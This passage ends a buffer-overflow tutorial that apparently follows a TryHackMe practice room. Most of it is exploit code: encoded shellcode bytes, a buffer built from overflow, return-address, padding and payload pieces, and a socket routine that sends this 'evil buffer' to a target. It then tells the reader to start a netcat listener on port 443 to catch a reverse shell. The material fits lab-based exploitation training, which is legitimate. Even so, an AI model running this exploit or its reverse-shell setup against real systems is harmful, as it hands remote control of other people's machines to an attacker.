payload += b"\x24\x03\x01\xd6\xdb\xac\x72\xff\x1f\xf8\x22\x97"
payload += b"\xb6\x81\xa8\x67\x36\x54\x7e\x37\x98\x07\x3f\xe7"
payload += b"\x58\xf8\xd7\xed\x56\x27\xc7\x0e\xbd\x40\x62\xf5"
payload += b"\x56\x65\x7a\xcb\xa1\x11\x7e\x33\xaf\x5a\xf7\xd5"
payload += b"\xc5\x8c\x5e\x4e\x72\x34\xfb\x04\xe3\xb9\xd1\x61"
payload += b"\x23\x31\xd6\x96\xea\xb2\x93\x84\x9b\x32\xee\xf6"
payload += b"\x0a\x4c\xc4\x9e\xd1\xdf\x83\x5e\x9f\xc3\x1b\x09"
payload += b"\xc8\x32\x52\xdf\xe4\x6d\xcc\xfd\xf4\xe8\x37\x45"
payload += b"\x23\xc9\xb6\x44\xa6\x75\x9d\x56\x7e\x75\x99\x02"
payload += b"\x2e\x20\x77\xfc\x88\x9a\x39\x56\x43\x70\x90\x3e"
payload += b"\x12\xba\x23\x38\x1b\x97\xd5\xa4\xaa\x4e\xa0\xdb"
payload += b"\x03\x07\x24\xa4\x79\xb7\xcb\x7f\x3a\xd7\x29\x55"
payload += b"\x37\x70\xf4\x3c\xfa\x1d\x07\xeb\x39\x18\x84\x19"
payload += b"\xc2\xdf\x94\x68\xc7\xa4\x12\x81\xb5\xb5\xf6\xa5"
payload += b"\x6a\xb5\xd2"
postfix = ""
buffer = prefix + overflow + retn + padding + payload + postfix
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
    print("Sending evil buffer...")
    s.send(buffer + "\r\n")
    print("Done!")
except:
    print("Could not connect.")

Before running exploit.py we need to re-attach the vulnerable app [ Ctrl+F2 → F9 ] and start a netcat listener to catch the reverse shell connection:

nc -nvlp 443 
Reverse Shell!

You can practise BOF here: https://tryhackme.com/room/bufferoverflowprep

LinkedIn: https://www.linkedin.com/in/anontuttuvenus/

Github: https://github.com/anontuttuvenus
